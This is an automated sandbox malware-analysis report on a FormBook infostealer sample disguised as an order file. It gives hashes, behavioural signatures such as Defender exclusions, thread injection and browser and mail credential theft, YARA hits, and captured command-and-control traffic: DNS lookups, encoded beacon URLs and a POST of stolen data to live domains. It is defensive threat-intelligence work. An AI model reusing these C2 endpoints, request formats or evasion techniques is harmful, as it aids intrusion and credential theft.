Windows Analysis Report
Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe

Overview

General Information

Sample name:	Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
Analysis ID:	1467083
MD5:	7c33fb31e0b8302eba116a02e649200b
SHA1:	b8cf4b26acf2cfb9f48ccc49a05b308425cbbd07
SHA256:	b250139ddfe1f4e0849357b17563dcd09d2dc82f69730c7e5e3797148b47ce16
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected FormBook

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://www.architect-usschool.com/s24g/	Avira URL Cloud: Label: malware
Source: http://architect-usschool.com/s24g/?Y6vp=3PLd8j&OdjTHtuX=4rIlPCx72NWCI0QJXJwD	Avira URL Cloud: Label: malware
Source: http://www.architect-usschool.com/s24g/?Y6vp=3PLd8j&OdjTHtuX=4rIlPCx72NWCI0QJXJwD+tzjHhGgLlyDkrck6XhMS8VcXSbKvpDPBj6V0V8nuLzRy/FwKWDUEv1cw0ImnsIqFnkVImpc8YyZ7gWSicgk/ENTSAvixeUyT+Tq9osdZT4ae7dFHSM=	Avira URL Cloud: Label: malware
Source: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix	Avira URL Cloud: Label: malware
Source: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe

ReversingLabs: Detection: 23%

Yara detected FormBook

Source: Yara match	File source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4565204551.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2506704352.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4571364654.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4576370278.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2507910619.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe

Joe Sandbox ML: detected

Uses 32bit PE files

Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: compact.pdbGCTL source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2506815789.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 00000009.00000003.2651430615.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EUSOiCcoIEEJJ.exe, 00000009.00000002.4564033459.000000000064E000.00000002.00000001.01000000.0000000C.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4565010474.000000000064E000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000A.00000003.2509176695.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000A.00000003.2506580871.00000000031EC000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, compact.exe, compact.exe, 0000000A.00000003.2509176695.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000A.00000003.2506580871.00000000031EC000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: CAhp.pdbSHA256 source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
Source:	Binary string: compact.pdb source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2506815789.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 00000009.00000003.2651430615.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CAhp.pdb source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe

Source: C:\Windows\SysWOW64\compact.exe

Code function: 10_2_02E2C170 FindFirstFileW,FindNextFileW,FindClose,

10_2_02E2C170

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\compact.exe	Code function: 4x nop then xor eax, eax		10_2_02E196F0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 4x nop then mov ebx, 00000004h		10_2_034E053F

Networking

Performs DNS queries to domains with low reputation

Source:

DNS query: www.hellokong.xyz

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 64.190.62.22 64.190.62.22
Source: Joe Sandbox View	IP Address: 203.161.49.220 203.161.49.220

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /jmiz/?Y6vp=3PLd8j&OdjTHtuX=FlIs+r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p/5DHHhHlE1nDIZgKO5qXvVh1+gwmyYcA+2CCaGrmZckpjuvJQ96WUy8TtzIG0Do= HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.fondazionegtech.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /92z0/?OdjTHtuX=Gchg326o6RWN/XFADw/V4eD2MO3apSP8yQOPkbolGTbWXGJL1kFLipwvr6KFDeoH1MC+XiIJPCdl50bZjywkZNBk97uFxrq9QGi9z8UXs1GhAfMLlFrOVkcHu0q9EP6WPl8Zh5k=&Y6vp=3PLd8j HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.mengistiebethlehem.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /oc7s/?Y6vp=3PLd8j&OdjTHtuX=ITz00edB1Uq7JDbRPTK5B57t89T2WQZ+hnFFsCQVLpiDf2LeJizgG+jH2jz5I+TBlRR/yAoHWWMQTB4d0WCMdZHpvgPMtRMFWqdBjyYGuisLgsnAd4XsPoSnl82L2CWvs48fsL0= HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.ad14.funUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /2769/?OdjTHtuX=rQ9MRvShllEvhf19NmQGPjdBfvwxqGfh/iQ/JyzvIKd3JVnhiEf6Ad8S1fm4YmYs4WBXtXN2+GWeVsdjOCq4N3yCg9FNbaHUg89/agQhGCosY8uNQEp6VxplmSeNniynJ3fH1F8=&Y6vp=3PLd8j HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.epicbazaarhub.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /wvam/?Y6vp=3PLd8j&OdjTHtuX=ppN4Kg7gaCRo+jf4iLEmna60kcJd+oo7/wZIRMT4+Man5OlGV28GmQNPMVld/mi8klF/kBnYjgc4RUC2chY7WuIAYm4xk+Ll6sKGI2rWgbxJmoqgO5rVx7RJwqzCMQvvfrLjQU4= HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.rz6grmvv.shopUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /oui5/?OdjTHtuX=SBbMJInblZiNUqJtj2t3oAZeaf7w1Mr63FaPzYR5npk3jTg+edZF9NME4tF9tViJCHx7c4tSq6N/qcOwzg98IChDG2ekcZOWcYJRK2znKimA3GQ/fbvAwxxdlKlVh8HBUwdv3Sg=&Y6vp=3PLd8j HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.hellokong.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /s24g/?Y6vp=3PLd8j&OdjTHtuX=4rIlPCx72NWCI0QJXJwD+tzjHhGgLlyDkrck6XhMS8VcXSbKvpDPBj6V0V8nuLzRy/FwKWDUEv1cw0ImnsIqFnkVImpc8YyZ7gWSicgk/ENTSAvixeUyT+Tq9osdZT4ae7dFHSM= HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.architect-usschool.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /3jr0/?OdjTHtuX=C6nbN3Z6SrmD48dKFL5Pdr+cZFmYp1QsQ3e628IyGZcRZCB2vhKb6ox4g6I37OYbmAVSFMbRXnVDWcusSAPk0vfQfIagm0ASlZK02lSA38wn9PDfH1oUKWJrxTMbBcOAU+1qziI=&Y6vp=3PLd8j HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.easybackpage.netUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /mwa4/?Y6vp=3PLd8j&OdjTHtuX=BKtoJfTGgHJzrpd1kXP6JuCpnJS0Vaq/yhZppoO2EP353cwV9Kf7u0HM3e0YD5Mg8P8TnPOgCoBiwA2kvNm9UdnLeQplEPepVbn/svzmQdla2L+ZsYtoIxEUyzWZOW0K59hRfLs= HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.superunicornpalace.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /rxdf/?OdjTHtuX=n5pckC1kDFTF1S5BKIsmiJ5ryDhRlCYaQVQlc2liktwXiyajKP48Wkncu6FoMqtxFtMv+2TSpEcAsDV+dI8BV0td651LvJeUOcJvnAipjtqBUQAoEW2kSo5oIr+iYWP+5LowsUg=&Y6vp=3PLd8j HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.tedjp-x.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /n8zi/?Y6vp=3PLd8j&OdjTHtuX=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTXePjBpDkk8R6CbNZjNtV+M1xTH1M7WEFVhsxtrVg+jjfEC0sBsxKcDNAG8QmzJp6ywkUHIkWAXYoQO53dC+2pPrw= HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.3cubesinterior.inUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /s0j2/?OdjTHtuX=BcB93STIeRzesDqYzmgjF/8Aqg2qoGbugvfC7gVQd0Epq+RTfyEF6eLz+ZShIqPWgjFYuR+pkePM3whd8giEyH2988JCuLY+vIFLWxAqbBoWpgzIu1DPnhlaAUBnkOtEvd711RA=&Y6vp=3PLd8j HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.artvectorcraft.storeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /pv57/?OdjTHtuX=6UcJOPuI3ds3m8dRFaGqe18kk0aRE6C9zfep+6iQQcPKXv8sEJKo1I2dFrwlAwFzKSJLgqMZnt8gW4RLGDqdj2op7I/d7Qwx4DLM/Sb7UzOzABLy3akf6gQBeurdxZRPhPoEffE=&Y6vp=3PLd8j HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.hondamechanic.todayUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Source: global traffic	DNS traffic detected: DNS query: www.fondazionegtech.org
Source: global traffic	DNS traffic detected: DNS query: www.mengistiebethlehem.com
Source: global traffic	DNS traffic detected: DNS query: www.ad14.fun
Source: global traffic	DNS traffic detected: DNS query: www.epicbazaarhub.com
Source: global traffic	DNS traffic detected: DNS query: www.rz6grmvv.shop
Source: global traffic	DNS traffic detected: DNS query: www.hellokong.xyz
Source: global traffic	DNS traffic detected: DNS query: www.architect-usschool.com
Source: global traffic	DNS traffic detected: DNS query: www.easybackpage.net
Source: global traffic	DNS traffic detected: DNS query: www.superunicornpalace.com
Source: global traffic	DNS traffic detected: DNS query: www.tedjp-x.com
Source: global traffic	DNS traffic detected: DNS query: www.3cubesinterior.in
Source: global traffic	DNS traffic detected: DNS query: www.artvectorcraft.store
Source: global traffic	DNS traffic detected: DNS query: www.macklaer.com
Source: global traffic	DNS traffic detected: DNS query: www.hondamechanic.today

Source: unknown

HTTP traffic detected: POST /92z0/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cache-Control: max-age=0Content-Length: 213Content-Type: application/x-www-form-urlencodedConnection: closeHost: www.mengistiebethlehem.comOrigin: http://www.mengistiebethlehem.comReferer: http://www.mengistiebethlehem.com/92z0/User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoData Raw: 4f 64 6a 54 48 74 75 58 3d 4c 65 4a 41 30 41 61 6c 79 6c 37 66 7a 6a 68 30 51 6d 2f 39 39 4d 72 45 4a 50 50 7a 71 78 44 4b 30 31 43 64 70 62 77 42 4f 6a 65 6f 58 56 74 76 31 6d 52 76 69 75 63 6d 2f 4e 7a 39 63 65 78 42 31 4f 79 54 54 58 6b 57 4d 53 64 62 39 56 37 41 75 78 49 44 59 4b 6b 2b 37 2f 4c 6b 33 6f 61 6a 63 31 69 2f 34 38 67 32 2b 31 47 53 41 2f 4d 6e 7a 6c 54 44 46 6d 73 76 6a 32 71 4a 4b 73 6d 42 55 47 49 4c 38 76 55 64 47 53 39 55 66 68 32 69 37 39 54 70 45 31 32 34 42 58 65 75 61 57 32 4b 51 78 69 41 54 5a 31 30 2f 44 71 73 6d 32 43 63 6f 75 64 57 52 63 31 71 47 45 37 66 4f 69 6b 43 42 6a 74 78 54 4b 63 73 33 38 52 73 Data Ascii: OdjTHtuX=LeJA0Aalyl7fzjh0Qm/99MrEJPPzqxDK01CdpbwBOjeoXVtv1mRviucm/Nz9cexB1OyTTXkWMSdb9V7AuxIDYKk+7/Lk3oajc1i/48g2+1GSA/MnzlTDFmsvj2qJKsmBUGIL8vUdGS9Ufh2i79TpE124BXeuaW2KQxiATZ10/Dqsm2CcoudWRc1qGE7fOikCBjtxTKcs38Rs

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:57:19 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://epicbazaarhub.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 14879Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 eb 96 eb 36 92 35 f8 fb e4 53 c0 f2 b2 53 b2 05 89 ba e5 85 4a 65 95 af 5d fe a6 dc f6 aa e3 ea 9a 6f 6c af 5c 20 19 22 71 12 04 58 00 28 a5 8e 2a 1f e6 5b f3 16 f3 b7 5f 6c 02 a4 ee a2 94 ca 4b 77 75 77 5e 48 22 10 b1 63 c7 8e 7d f3 c9 b7 3f 7d f3 cb ff fe f9 3b 92 d8 54 dc 9e dd b8 17 11 4c c6 a3 5a 66 e9 d7 7f a9 b9 18 b0 e8 f6 ec dd 4d 0a 96 91 30 61 da 80 1d d5 fe fa cb f7 f4 aa 46 da ab 1b c9 52 18 d5 26 1c a6 99 d2 b6 46 42 25 2d 48 cc 9c f2 c8 26 a3 08 26 3c 04 5a 1c 9a 84 4b 6e 39 13 d4 84 4c c0 a8 53 e0 6c c0 9c 6b 15 28 6b ce 57 20 e7 29 7b a0 3c 65 31 d0 4c 83 6b e2 0b a6 63 38 2f 0a 2d b7 02 6e 7f fe f7 ff 13 73 89 08 ff fe ff 2a 02 d2 95 6a 16 31 f2 f9 a7 57 dd 4e 67 48 20 e3 61 c0 3e 32 a6 93 3c 68 85 2a bd 69 97 85 67 37 82 cb 7b a2 41 8c ce 23 69 5c 87 31 d8 30 39 27 09 7e 8d ce db ed bd d2 b2 ef aa ac c6 84 05 2d 99 85 1a b1 b3 0c 75 60 59 26 78 c8 2c 57 b2 ad 8d f9 f2 21 15 78 e5 da 8d 6a df 03 44 24 63 9a ed 53 22 9f 6b f6 f7 5c 0d 6b 65 eb 5a 62 6d 66 fc 0a 02 ed 31 82 b4 6b af a6 11 01 6a 9c a2 c4 ff fe 7f 34 57 e6 d5 b4 f0 df a1 99 4d 7e 26 d4 3c b3 b7 67 53 2e 23 35 6d dd 4d 33 48 d5 07 fe 1e ac e5 32 36 64 44 e6 b5 80 19 f8 ab 16 35 7f 81 fd 5b fb b7 b6 69 4d 5b 4a c7 bf b5 8b c5 9b df 10 5c c3 6f ed a2 f8 b7 76 67 d0 f2 5a bd df da 97 dd 87 cb ee 6f ed 5a b3 06 0f 16 eb 5b 99 8c f1 60 26 f1 cb f0 b0 b0 40 c3 f7 77 25 20 7e b9 b3 ca 75 08 35 7f 5e 43 67 a1 a4 45 d9 02 bf 80 df 13 e3 b7 f6 34 a3 5c 86 22 8f 5c b7 0f a6 08 14 75 14 d7 05 38 72 2b e5 b2 f5 c1 fc 61 02 7a 74 d1 1a b4 06 b5 c7 c7 e1 59 fb 8b 4f c8 2f 09 37 64 cc 05 10 7c b3 dc 2a 1a 83 04 8d 7d 23 f2 45 fb ec 93 71 2e 43 b7 d6 3a 6f ca c6 7c c2 34 51 4d d3 84 e1 32 4e c2 3a 34 e6 56 cf 8a 3b 3b 9a 9b 3c cb 94 b6 bf 80 b1 c6 87 a6 e5 29 7e b1 34 f3 eb 12 a6 e4 5b 04 6e b4 26 4c e4 f0 d3 b8 de 78 1c 1a 30 06 61 de 5b a5 51 ac 96 01 fb 03 8e 5c 57 cd ff f5 fe a7 7f 6d 19 ab 71 75 7c 3c ab db 46 e3 11 d5 08 13 d7 ee f1 71 d5 3e ab 63 0f 47 0d 5a 21 8e aa ff 02 a1 ad 7b 4d af 89 67 26 27 0c 97 c1 23 9b ac 8f 09 f0 38 b1 0d 0c e0 d4 e2 17 5c 66 dd 62 ba d7 18 96 03 38 96 7f e5 d2 f6 ba 5f 69 cd 66 75 68 c5 c8 c9 6d 12 b9 b3 53 a0 5b 11 26 36 9a 7a 54 7f 05 27 59 70 6a be 15 9b c6 50 83 cd b5 24 b6 05 68 82 59 7d b5 57 94 af 31 5f 5c c2 68 34 d2 bf da df 1f 1b 6b 81 f3 a5 c0 66 ca 9d fc 98 1d a2 a3 6a 63 c1 e2 9a bf 28 74 30 b5 df f2 e8 aa 17 e2 73 3c ee fd 96 8f c1 1b ff 96 77 3d 2f c2 e7 05 bb 2c 23 b5 83 69 c1 56 5a e3 0f 9f 74 fc 4f b6 61 a3 31 db f8 ee Data Ascii: 65SSJe]ol\ "qX(*[
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:57:21 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://epicbazaarhub.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 14879Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 eb 96 eb 36 92 35 f8 fb e4 53 c0 f2 b2 53 b2 05 89 ba e5 85 4a 65 95 af 5d fe a6 dc f6 aa e3 ea 9a 6f 6c af 5c 20 19 22 71 12 04 58 00 28 a5 8e 2a 1f e6 5b f3 16 f3 b7 5f 6c 02 a4 ee a2 94 ca 4b 77 75 77 5e 48 22 10 b1 63 c7 8e 7d f3 c9 b7 3f 7d f3 cb ff fe f9 3b 92 d8 54 dc 9e dd b8 17 11 4c c6 a3 5a 66 e9 d7 7f a9 b9 18 b0 e8 f6 ec dd 4d 0a 96 91 30 61 da 80 1d d5 fe fa cb f7 f4 aa 46 da ab 1b c9 52 18 d5 26 1c a6 99 d2 b6 46 42 25 2d 48 cc 9c f2 c8 26 a3 08 26 3c 04 5a 1c 9a 84 4b 6e 39 13 d4 84 4c c0 a8 53 e0 6c c0 9c 6b 15 28 6b ce 57 20 e7 29 7b a0 3c 65 31 d0 4c 83 6b e2 0b a6 63 38 2f 0a 2d b7 02 6e 7f fe f7 ff 13 73 89 08 ff fe ff 2a 02 d2 95 6a 16 31 f2 f9 a7 57 dd 4e 67 48 20 e3 61 c0 3e 32 a6 93 3c 68 85 2a bd 69 97 85 67 37 82 cb 7b a2 41 8c ce 23 69 5c 87 31 d8 30 39 27 09 7e 8d ce db ed bd d2 b2 ef aa ac c6 84 05 2d 99 85 1a b1 b3 0c 75 60 59 26 78 c8 2c 57 b2 ad 8d f9 f2 21 15 78 e5 da 8d 6a df 03 44 24 63 9a ed 53 22 9f 6b f6 f7 5c 0d 6b 65 eb 5a 62 6d 66 fc 0a 02 ed 31 82 b4 6b af a6 11 01 6a 9c a2 c4 ff fe 7f 34 57 e6 d5 b4 f0 df a1 99 4d 7e 26 d4 3c b3 b7 67 53 2e 23 35 6d dd 4d 33 48 d5 07 fe 1e ac e5 32 36 64 44 e6 b5 80 19 f8 ab 16 35 7f 81 fd 5b fb b7 b6 69 4d 5b 4a c7 bf b5 8b c5 9b df 10 5c c3 6f ed a2 f8 b7 76 67 d0 f2 5a bd df da 97 dd 87 cb ee 6f ed 5a b3 06 0f 16 eb 5b 99 8c f1 60 26 f1 cb f0 b0 b0 40 c3 f7 77 25 20 7e b9 b3 ca 75 08 35 7f 5e 43 67 a1 a4 45 d9 02 bf 80 df 13 e3 b7 f6 34 a3 5c 86 22 8f 5c b7 0f a6 08 14 75 14 d7 05 38 72 2b e5 b2 f5 c1 fc 61 02 7a 74 d1 1a b4 06 b5 c7 c7 e1 59 fb 8b 4f c8 2f 09 37 64 cc 05 10 7c b3 dc 2a 1a 83 04 8d 7d 23 f2 45 fb ec 93 71 2e 43 b7 d6 3a 6f ca c6 7c c2 34 51 4d d3 84 e1 32 4e c2 3a 34 e6 56 cf 8a 3b 3b 9a 9b 3c cb 94 b6 bf 80 b1 c6 87 a6 e5 29 7e b1 34 f3 eb 12 a6 e4 5b 04 6e b4 26 4c e4 f0 d3 b8 de 78 1c 1a 30 06 61 de 5b a5 51 ac 96 01 fb 03 8e 5c 57 cd ff f5 fe a7 7f 6d 19 ab 71 75 7c 3c ab db 46 e3 11 d5 08 13 d7 ee f1 71 d5 3e ab 63 0f 47 0d 5a 21 8e aa ff 02 a1 ad 7b 4d af 89 67 26 27 0c 97 c1 23 9b ac 8f 09 f0 38 b1 0d 0c e0 d4 e2 17 5c 66 dd 62 ba d7 18 96 03 38 96 7f e5 d2 f6 ba 5f 69 cd 66 75 68 c5 c8 c9 6d 12 b9 b3 53 a0 5b 11 26 36 9a 7a 54 7f 05 27 59 70 6a be 15 9b c6 50 83 cd b5 24 b6 05 68 82 59 7d b5 57 94 af 31 5f 5c c2 68 34 d2 bf da df 1f 1b 6b 81 f3 a5 c0 66 ca 9d fc 98 1d a2 a3 6a 63 c1 e2 9a bf 28 74 30 b5 df f2 e8 aa 17 e2 73 3c ee fd 96 8f c1 1b ff 96 77 3d 2f c2 e7 05 bb 2c 23 b5 83 69 c1 56 5a e3 0f 9f 74 fc 4f b6 61 a3 31 db f8 ee Data Ascii: 65SSJe]ol\ "qX(*[
